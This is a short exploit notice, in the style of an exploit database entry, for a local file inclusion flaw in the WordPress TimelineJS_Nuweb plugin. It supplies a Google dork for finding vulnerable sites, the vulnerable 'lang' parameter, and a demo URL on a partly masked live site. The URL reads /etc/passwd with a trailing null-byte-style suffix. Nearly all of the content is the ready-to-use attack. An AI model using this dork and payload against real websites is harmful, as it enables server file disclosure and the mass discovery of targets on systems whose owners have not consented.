# Exploit Title: Wordpress TimelineJS_Nuweb Plugin Local File Inclusion Vulnerability #
# Google Dork: inurl:/wp-content/plugins/TimelineJS_Nuweb/get_posts_json.php?lang= #
# Date: 2012-29-11
# Exploit Author: Ashiyane Digital Security Team #
# Discovered by : Amirh03in #
# Tested on: Linux #
# Security Risk : MEdium #
# Category: Web Application #
===================================
===================================
# Location: http://site.com/wp-content/plugins/TimelineJS_Nuweb/get_posts_json.php?lang=[Directory or file] #
# Demo : http://brgsXXXe.com/wp/wp-content/plugins/TimelineJS_Nuweb/get_posts_json.php?lang=/etc/passwd%0 #
=======================================
=======================================
Greetz to: My Lord ALLAH
=======================================